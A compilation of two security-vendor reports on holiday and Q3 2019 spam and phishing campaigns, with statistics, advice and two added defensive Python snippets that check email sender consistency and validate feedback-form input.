The main trend of 2019 was the rise in the number of attacks on the corporate sector. Fraudulent schemes previously used to repeatedly attack ordinary users changed direction, adding new intricacies to cybercriminal tactics.

Happy New Fear! Gift-wrapped spam and phishing (https://securelist.com/new-year-phishing-spam/96124/, Fri, 07 Feb 2020 10:01:33 +0000)

Pre-holiday spam

Easy money

In the run-up to Christmas and New Year, scam e-mails mentioning easy pickings, lottery winnings, and other cash surprises are especially popular. All the more so given how simple it is to adapt existing schemes simply by mentioning the holiday in the subject line.

For example, one scam e-mail with the subject line “Xsmas gift” or “Xmas offer” talks about a “special donation” and provides a contact e-mail address for more information. Recipients who respond are lured into parting with a sum of money through social engineering.

Scammers offering “Xmas gifts” are very persistent

Another Christmas-related scheme aims to steal cryptocurrency. Scammers offer the chance to earn some bitcoins before the holiday period using “secret” software that can be downloaded via a link:

After downloading and running the program (the malware Hoax.Win32.Agent.gen), the user is prompted to enter their cryptowallet credentials and wait until the request is executed.

Next, the user is informed that the cryptocurrency will be credited to their account immediately after they pay a transfer fee. The result is predictable — the user earns no bitcoins, and the “fee” goes to the scammers.

Extortion

Standard extortion schemes are also adapted for the festive period. For instance, the authors of this e-mail threaten to spoil the victim’s Christmas by smearing them as a pedophile. To prevent this, the recipient needs to transfer the equivalent of $5,000 in bitcoin to the extorters:

Malicious mailings and the corporate sector

Corporate e-mail addresses are also on the cybercriminal radar. To extract confidential information from recipients, or install malware, scammers mask malicious e-mails as business correspondence. In the pre-holiday period, when sales are on the rise, retail finds itself in a special risk zone. E-mails with malicious attachments (DOC or XLS) are sent under the guise of messages related to orders for goods.

For example, hidden in the attachment to this e-mail is Trojan-Downloader.MSOffice.SLoad.sb, which in turn downloads other malware to the victim’s computer:

Malicious attachments can also be disguised as invoices and payment notices. The archive attached to this e-mail actually contains the Trojan-PSW.MSIL.Agensla.hdt stealer, which harvests logins and passwords, and then sends them to the cybercriminals:

Statistics

The share of spam as a percentage of world email traffic gradually increased throughout the entire Q4 2019 and in December amounted to 57.26%. Thus it almost reached the maximum value for the second half of the year — 57.78% (which we recorded in August).


The share of spam in global email traffic, Q3 and Q4 2019

A similar picture was observed in Russia, although in the fall the growth was less pronounced: from September to November the amount of spam traffic grew by a total of 0.86 percentage points (compared to a growth rate of 1.14 percentage points for the entire world) to reach 51.15% of total email volume. However, during the last month of the year, the share of spam jumped dramatically by 3.36 p.p. (compared to only 1.44% for the entire world) and exceeded even the summer indicators (54.51% in December as opposed to 53.5% in July and 53.76% in August). Most likely, such a sharp rise can be attributed to the traditional uptick in holiday season activity by spammers.


The share of spam in Russian email traffic, Q3 and Q4 2019

In the Asia-Pacific region as a whole, we also observed an increase in the amount of spam in email traffic from September (50.19%) to December (52.62%). As you can see from the diagram, the increase is quite gradual. At the same time, the volume of junk messages reached a peak in January, when their share reached 55.48%. This is most likely due to the Lunar New Year, which is celebrated in most countries of the region and which this year fell on January 25.


The share of spam in email traffic in the Asia-Pacific Region, July 2019 – January 2020

Christmas/New Year phishing

Fake websites

Phishers lured users onto fake pages with the promise of favorable terms, discounts, and gifts. For example, they tried to gain access to Amazon Prime accounts by offering Christmas promotions supposedly on behalf of the service; to take part, users were asked to enter their account credentials.

Besides fake versions of real websites, non-existent stores popped up online offering huge discounts. Their catalogs typically contain a very limited range of premium-class products, and the websites themselves look more like landing pages. A characteristic attribute of such sites is a countdown timer showing how much time is left before the “promotion” ends.

In addition to expensive goods, scammers offer libido-boosting drugs — also at great discounts. The product range in such “medical stores” is not very wide:

The information about the domain shows that it was registered recently, which is another indicator of fakeness.

Nor did scammers overlook gamers. For instance, we discovered phishing pages mimicking the Warface multiplayer website. In honor of New Year, one of the fakes promised gamers 30 days’ free use of some powerful weapons, while another presented a golden rifle for joining Santa’s helpers. To receive either “prize,” players had to enter their username and password on a fake login page, thereby giving the scammers access to their account. Accounts with a high in-game rank and unique, paid-for weapons can fetch a good price.

Cash gifts

Fake websites promising easy money were also given a festive makeover: they offered New Year payouts to the poor, sponsorship gifts, giveaways, etc. As usual in such cases, visitors are invited to complete a simple task, for example, take a survey and enter some personal data. After a five-digit sum seemingly ready for transfer is displayed on screen, the victim is asked to pay a service fee — which, of course, goes straight to the scammers.

To add credibility and urgency, the attackers place eye-catching information to nudge the victim into acting: notifications about the limited nature of the offer, number of visitors who are currently filling in the form, or a “bonuses” countdown:

Crypto fans did not escape phishers’ attention either. It was shortly before Christmas that we came across a scheme offering a festive giveaway of bitcoins and ether supposedly from the Binance crypto exchange. Naturally, to receive a “gift” it was necessary to confirm participation by transferring 5 BTC or 50 ETH to the “organizers.”

To promote the “event,” the scammers posted an article about it on the Medium platform with dozens of enthusiastic comments from “winning” users.

Statistics

In Q4 2019, the share of attacks that sought to steal financial data and accounts at online banks and stores out of the total number of phishing attacks amounted to 52.61%. This exceeds both the indicator for the previous quarter (43.19%) and the indicator for the whole year (51.4%). We observed a similar situation in 2018 and 2017, with the only difference being that the jump was more noticeable last year — from 44.67% on average for the entire year and 34.67% in Q3 to 51.18% in Q4.

The share of phishing attacks on online stores and financial services during Q3 and Q4 of 2017, 2018, and 2019

It is curious that by the end of 2019, fraudsters had partially lost interest in electronic payment services. For the first time in three years, in Q4 the share of phishing attacks on such resources decreased by 1.21 percentage points compared to the previous reporting period and amounted to 14%.

At the same time, the popularity of non-financial categories of websites also fell, and in the ranking of the most popular attack targets for the last quarter, payment services rose from fourth to third place, displacing social networks and blogs, which were attacked only in 5.89% of cases. The leading targets by number of phishing attacks in Q4 were bank resources (29.73%), ahead of global Internet portals (22.81%), which had led the ranking during the previous quarter (23.81%).

The distribution of organizations whose users were attacked by phishers by category during Q4 2019

We analyzed the number of attacks on major commercial platforms during the period of November 11 to December 31. As expected, the number of attacks jumped shortly before Black Friday, which fell on November 29, and remained at a high level until the Christmas and New Year holidays. In particular, the daily share of phishing schemes using the eBay brand (as a percentage of all attacks that used the brand during the period) had stayed at 1% since mid-November; as of November 27 this figure was 3.15%, and as of December 2 it had grown by almost one-and-a-half percentage points to 4.63%.

The distribution of phishing attacks using the eBay brand by day, November 11, 2019 — December 31, 2019

We observed a similar situation with phishing attacks that utilized the Alibaba brand: the peak of activity occurred on November 27 and lasted until December 4. In both cases there was a short break in fraudulent activity in the middle of December: on December 15 it fell practically to zero, but began to rise again with the approach of Christmas and New Year.

The distribution of phishing attacks using the Alibaba brand by day, November 11, 2019 — December 31, 2019

Tips and recommendations

So as not to fall for scams and tricks, it is important to take easy money offers with a massive pinch of festive salt.

If you are a consumer:

  • Remember that the only free cheese is in a mousetrap. If you are suddenly offered a reward for taking part in a survey, or a huge discount on luxury goods, be very wary.
  • Do not follow links in e-mails or messages in social networks if you have even the slightest doubt.
  • Be very careful when making purchases on unfamiliar websites. If an online store has few products, it might not be real. If the URL of a well-known website seems strange, that too is cause for concern.
  • Do not install software from unknown sources advertised in e-mails.
  • Use a reliable security solution.

If you are a company employee:

  • Read incoming e-mails from strangers with a critical eye. To spot malicious content in business correspondence, we recommend that you first check the sender address and autosignature. If they do not match, it should raise a red flag. It is also worth comparing the information in the e-mail with that on the website of the company in whose name the message was sent — the contact details might be completely different.
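
The sender-address check in the last tip can be automated at the mail gateway or in a triage script. Below is an added example written for this page, not code from the original article or from Kaspersky: it compares the From domain with the Reply-To and Return-Path domains and with the domains that appear in the signature block, which is exactly the mismatch the tip describes. Both messages are constructed, and every name, domain and address in them is invented.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed messages (invented names, domains and addresses). The first
# shows the mismatch described in the tip: the From domain is a lookalike,
# replies and bounces go to a relay, and the signature names the real company.
SUSPICIOUS_MESSAGE = """\
From: "Acme Corp Accounting" <accounting@acme-corp-invoices.example>
Reply-To: billing.desk@mail-relay-49.example
Return-Path: <bounce@mail-relay-49.example>
To: employee@victim-company.example
Subject: Invoice 2019-1187 overdue
Content-Type: text/plain; charset="utf-8"

Please settle the attached invoice today.

--
Jane Doe
Accounts Receivable, Acme Corp
jane.doe@acme-corp.example | +1 555 0100 | www.acme-corp.example
"""

CLEAN_MESSAGE = """\
From: "Acme Corp Accounting" <accounting@acme-corp.example>
Reply-To: accounting@acme-corp.example
To: employee@victim-company.example
Subject: Invoice 2019-1187
Content-Type: text/plain; charset="utf-8"

Invoice attached.

--
Jane Doe, Acme Corp
jane.doe@acme-corp.example
"""

ADDR_DOMAIN = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")
WEB_DOMAIN = re.compile(r"\b(?:www\.|https?://)([\w-]+(?:\.[\w-]+)+)", re.IGNORECASE)


def domain_of(header_value):
    """Domain part of the first address in a header value, lower-cased."""
    return parseaddr(header_value)[1].rpartition("@")[2].lower()


def body_text(msg):
    """Plain-text body, taking the first text/plain part of a multipart message."""
    part = msg
    if msg.is_multipart():
        part = next((p for p in msg.walk() if p.get_content_type() == "text/plain"), None)
        if part is None:
            return ""
    return part.get_payload(decode=True).decode(part.get_content_charset() or "utf-8", "replace")


def signature_block(body):
    """Text after the conventional '-- ' separator, else the last four lines."""
    pieces = re.split(r"\n-- ?\n", body, maxsplit=1)
    return pieces[1] if len(pieces) == 2 else "\n".join(body.splitlines()[-4:])


def header_consistency(raw_message):
    """Return findings where the sender identity does not line up; [] means consistent."""
    msg = message_from_string(raw_message)
    from_dom = domain_of(msg.get("From", ""))
    findings = []
    for hdr in ("Reply-To", "Return-Path"):
        value = msg.get(hdr)
        if value and domain_of(value) != from_dom:
            findings.append("%s domain %s differs from From domain %s"
                            % (hdr, domain_of(value), from_dom))
    # The signature is where the scammer names the company being impersonated,
    # so its domains should agree with the envelope.
    sig = signature_block(body_text(msg))
    sig_domains = {d.lower() for d in ADDR_DOMAIN.findall(sig) + WEB_DOMAIN.findall(sig)}
    if sig_domains and from_dom not in sig_domains:
        findings.append("signature names %s but From is %s"
                        % (", ".join(sorted(sig_domains)), from_dom))
    return findings


if __name__ == "__main__":
    print(header_consistency(SUSPICIOUS_MESSAGE))
    print(header_consistency(CLEAN_MESSAGE))
```

A legitimate company that routes replies through a ticketing domain will also produce the Reply-To finding, so in practice the result is a signal for the reader or a filter score, not a verdict on its own.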

Spam and phishing in Q3 2019 (https://securelist.com/spam-report-q3-2019/95177/, Tue, 26 Nov 2019 10:00:16 +0000)

Quarterly highlights

Amazon Prime

In Q3, we registered numerous scam mailings related to Amazon Prime. Most of the phishing emails with a link to a fake Amazon login page offered new prices or rewards for buying things, or reported problems with membership, etc. Against the backdrop of September’s Prime Day sale, such messages were plausible.

Scammers also used another fraudulent scheme: An email informed victims that their request to cancel Amazon Prime had been accepted, but if they had changed their mind, they should call the number in the message. Fearing their accounts may have been hacked, victims phoned the number — this was either premium-rate and expensive, or, worse, during the call the scammers tricked them into revealing confidential data.

Scammers collect photos of documents and selfies

This quarter we detected a surge in fraud related to stealing photos of documents and selfies with them (often required for registration or identification purposes). In phishing emails seemingly from payment systems and banks, users were asked under various pretexts to confirm their identity by going to a special page and uploading a selfie with an ID document. The fake sites looked quite believable, and provided a list of necessary documents with format requirements, links to privacy policy, user agreement, etc.

Some scammers even managed without a fake website. For instance, in summer Italian users were hit by a spam attack involving emails about a smartphone giveaway. To receive the prize, hopefuls had to send a photograph of an ID document and a selfie to the specified email address. To encourage victims to respond, the scammers stated that the offer would soon expire.

To obtain copies of documents, scammers also sent fake Facebook messages in which recipients were informed that access to their accounts had been restricted due to complaints about the content of some posts. To prevent their account from being deleted, they were instructed to send a photo or scan of a driving license and other ID documents with a selfie, plus medical insurance details.

YouTube and Instagram

Scammers continue to exploit traditional schemes on new platforms, and Q3 was a bumper quarter in this regard. For instance, YouTube ads appeared offering the viewer the chance to earn a lot of quick and easy money. The video explained to users that they had to take a survey and provide personal details, after which they would receive a payout or a gift from a large company, etc. To add credibility, fake reviews from supposedly “satisfied customers” were posted under the video. What’s more, the enthusiastic bot-generated comments did not appear all in one go, but were added gradually to look like a live stream.

All the user had to do was follow the link under the video and then follow the steps in the video instructions. Sure, to receive the handout, a small “commission fee” or payment to “confirm the account” was required.

Similar schemes did the rounds on Instagram. Advertising posts in the name of various celebrities (fake accounts are easily distinguished from real ones by the absence of a blue tick) were often used to lure fans with prize draws or rewards for completing a paid survey. As with the YouTube videos, there were plenty of fake glowing comments under such posts. Given that such giveaways by stars are not uncommon, inattentive users could swallow the bait.

Back to school

In Q3, we registered a series of attacks related in one way or another to education. Phishers harvested usernames and passwords from the personal accounts of students and lecturers using fake pages mimicking university login pages.

The scammers were looking not for financial data, but for university research papers, as well as any personal information that might be kept on the servers. Data of this kind is in high demand on the darknet market. Even data that seems useless at first can be used by cybercriminals to prepare a targeted attack.

One way to create phishing pages is to hack into legitimate resources and post fraudulent content on them. In Q3, phishers hacked school websites and created fake pages on them to mimic login forms for commonly used resources.

Scammers also tried to steal usernames and passwords for the mail servers of educational service providers. To do so, they mailed out phishing messages disguised as support service notifications asking recipients to confirm that the mail account belonged to them.

Apple product launch

In September, Apple unveiled its latest round of products, and as usual the launch was followed by fans and scammers alike — we detected phishing emails in mail traffic aimed at stealing Apple ID authentication data.

Scammers also harvested users’ personal data by sending spam messages offering free testing of new releases.

The number of attempts to open fake websites mentioning the Apple brand rose in the runup to the unveiling of the new product line and peaked on the actual day itself:

Number of attempts to open Apple-related phishing pages, September 2019

Attacks on pay TV users

To watch TV or record live broadcasts in the UK, a license fee is payable. This was exploited by spammers who sent out masses of fake license expiry/renewal messages. What’s more, they often used standard templates saying that the license could not be renewed because the bank had declined the payment.

The recipient was then asked to verify (or update) their personal and/or payment details by clicking on a link pointing to a fake data entry and payment form.

Spam through website feedback forms

The website of any large company generally has one or even several feedback forms. These can be used to ask questions, express wishes, sign up for company events, or subscribe to newsletters. But messages sent via such forms often come not only from clients or interested visitors, but from scammers too.

There is nothing new about this phenomenon per se, but it is interesting to observe how the mechanism for sending spam through forms has evolved. If previously spammers targeted company mailboxes linked to feedback forms, now fraudsters use them to send spam to people on the outside.

This is possible because some companies do not pay due attention to website security, allowing attackers to bypass simple CAPTCHA tests with the aid of scripts and to register users en masse using feedback forms. Another oversight is that fields such as the username field accept arbitrary text, including links. As a result, the person whose e-mail address was entered receives a genuine registration confirmation from the company, but one that carries the scammers' message; the company itself receives nothing.

Such spam started to surge several years ago, and has recently become even more popular — in Q3 services for delivering advertising messages through feedback forms began to be advertised in spam mailings.
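Server-side checks that close the two gaps described above, a name field that accepts links and an unlimited number of confirmation mails per address, added here as an illustration rather than any particular site's code. The 80-character limit, the three-confirmation cap and the regexes are assumptions for the example.

```python
import re
from collections import defaultdict

# Assumptions for this example: an 80-character name limit, and at most three
# confirmation mails per address before further signups are ignored.
MAX_NAME_LEN = 80
MAX_CONFIRMATIONS_PER_ADDRESS = 3
# Anything that looks like a link: a scheme, "www.", or a bare host such as cheap-pills.test
LINK_RE = re.compile(r"https?://|www\.|\b[\w-]+(?:\.[\w-]{2,})+\b", re.I)
# A name: starts with a letter, then letters, digits, spaces, apostrophes, dots or hyphens
NAME_RE = re.compile(r"^[^\W\d_][\w' .-]*$")

_confirmations_sent = defaultdict(int)  # in-memory counter; a real service would persist this

def validate_display_name(name):
    """Return (ok, reason) for a free-text 'name' field before it goes anywhere near an e-mail."""
    if not name or len(name) > MAX_NAME_LEN:
        return False, "empty or too long"
    if any(ord(ch) < 32 for ch in name):  # CR/LF in the field could inject extra mail headers
        return False, "control characters"
    if LINK_RE.search(name):
        return False, "contains a link"
    if not NAME_RE.match(name):
        return False, "unexpected characters"
    return True, ""

def should_send_confirmation(recipient):
    """Cap confirmations per address so a scripted signup loop cannot use the form as a relay."""
    key = recipient.strip().lower()
    _confirmations_sent[key] += 1
    return _confirmations_sent[key] <= MAX_CONFIRMATIONS_PER_ADDRESS

def build_confirmation_email(recipient, display_name):
    """Fixed-form confirmation text; the validated name is the only user-controlled field."""
    ok, reason = validate_display_name(display_name)
    if not ok:
        raise ValueError(f"rejected display name: {reason}")
    return (
        f"To: {recipient}\n"
        "Subject: Confirm your subscription\n\n"
        f"Hello {display_name},\n"
        "Someone entered this address on our website. If that was you, follow the "
        "confirmation link; otherwise ignore this message and no account will be created.\n"
    )
```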

Attacks on corporate email

Last quarter, we observed a major spam campaign in which scammers sent emails pretending to be voicemail notifications. To listen to the supposed message, the recipient was invited to click or tap the (phishing) link that pointed to a website mimicking the login page of a popular Microsoft service. It was a page for signing either into Outlook or directly into a Microsoft account.

The attack was aimed specifically at corporate mail users, since various business software products allow the exchange of voice messages and inform users of new ones via email.

It is worth noting that the number of spam attacks aimed specifically at the corporate sector has increased significantly of late. Cybercriminals are after access to employees’ email.

Another common trick is to report that incoming emails are stuck in the delivery queue. To receive these supposedly undeliverable messages, the victim is prompted to follow a link and enter their corporate account credentials on another fake login page, from where they go directly to the cybercriminals. Last quarter, our products blocked many large-scale spam campaigns under the guise of such notifications.

Statistics: spam

Proportion of spam in mail traffic

Share of spam in global mail traffic, Q2 and Q3 2019

In Q3 2019, the largest share of spam was recorded in August (57.78%). The average percentage of spam in global mail traffic was 56.26%, down 1.38 p.p. against the previous reporting period.

Sources of spam by country

Sources of spam by country, Q3 2019

The TOP 5 spam-source countries remain the same as last quarter, only their percentage shares are slightly different. China is in first place (20.43%), followed by the US (13.37%) and Russia (5.60%). Fourth position goes to Brazil (5.14%) and fifth to France (3.35%). Germany took sixth place (2.95%), followed — with a gap of less than 0.5 p.p. — by India (2.65%), Turkey (2.42%), Singapore (2.24%), and Vietnam (2.15%).

Spam email size

Spam email size, Q2 and Q3 2019

In Q3 2019, the share of very small emails (up to 2 KB) in spam decreased by 4.38 p.p. to 82.93%. The proportion of emails sized 5-10 KB grew slightly (by 1.52 p.p.) against the previous quarter to 3.79%.

Meanwhile, the share of 10-20 KB emails climbed by 0.26 p.p. to 2.24%. As for the number of 20-50 KB emails, their share changed more significantly, increasing by 2.64 p.p. (up to 4.74%) compared with the previous reporting period.

Malicious attachments in email

Number of Mail Anti-Virus triggerings, Q2 2019 – Q3 2019

In Q3 2019, our security solutions detected a total of 48,089,352 malicious email attachments, which is almost five million more than in Q2. July was the most active month with 17 million Mail Anti-Virus triggerings, while August was the “calmest” — with two million fewer.

TOP 10 malicious attachments in mail traffic, Q3 2019

In Q3, first place by prevalence in mail traffic went to the Office malware Exploit.MSOffice.CVE-2017-11882.gen (7.13%); in second place was the Worm.Win32.WBVB.vam worm (4.13%), and in third was another malware aimed at Microsoft Office users, Trojan.MSOffice.SAgent.gen (2.24%).

TOP 10 malware families, Q3 2019

As for malware families, the Backdoor.Win32.Androm family (7.49%) claimed first place.

In second place are Microsoft Office exploits from the Exploit.MSOffice.CVE-2017-11882.gen family (7.20%). And in third is Worm.Win32.WBVB.vam (4.60%).

Countries targeted by malicious mailings

Distribution of Mail Anti-Virus triggerings by country, Q3 2019

First place by number of Mail Anti-Virus triggerings in Q3 2019 was retained by Germany. Its score increased by 0.31 p.p. to 10.36%. Vietnam also remained in the TOP 3, rising to second position (5.92%), and Brazil came in third just a tiny fraction behind.

Statistics: phishing

In Q3 2019, the Anti-Phishing system prevented 105,220,094 attempts to direct users to scam websites. The percentage of unique attacked users was 11.28% of the total number of users of Kaspersky products worldwide.

Attack geography

The country with the largest share of users attacked by phishers in Q3 2019 was Venezuela (30.96%), which took second place in the previous quarter and has since added 5.29 p.p.

Geography of phishing attacks, Q3 2019

Having lost 3.53 p.p., Greece ranked second (22.67%). Third place, as in the last quarter, went to Brazil (19.70%).

Country      %*
Venezuela    30.96
Greece       22.67
Brazil       19.70
Honduras     17.58
Guatemala    16.80
Panama       16.70
Australia    16.18
Chile        15.98
Ecuador      15.64
Portugal     15.61

* Share of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky users in the country

Organizations under attack

The rating of categories of organizations attacked by phishers is based on triggers of the Anti-Phishing component on user computers. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

For the first time this year, the share of attacks on organizations in the Global Internet Portals category (23.81%) exceeded the share of attacks on credit organizations (22.46%). Social networks (20.48%) took third place, adding 11.40 p.p. to their share.

Distribution of organizations subjected to phishing attacks by category, Q3 2019

In addition, the TOP 10 said goodbye to the Government and Taxes category.

Its place was taken by the Financial Services category, which covers companies providing financial services that fall outside the Banks and Payment Systems categories: insurance, leasing, brokerage and similar providers.

Conclusion

The average share of spam in global mail traffic (56.26%) this quarter decreased by 1.38 p.p. against the previous reporting period, while the number of attempted redirects to phishing pages compared to Q2 2019 fell by 25 million to just over 105 million.

Top in this quarter’s list of spam-source countries is China, with a share of 20.43%. Our security solutions blocked 48,089,352 malicious mail attachments, while Backdoor.Win32.Androm became the most common mail-based malware family — its share of mail traffic amounted to 7.49%.
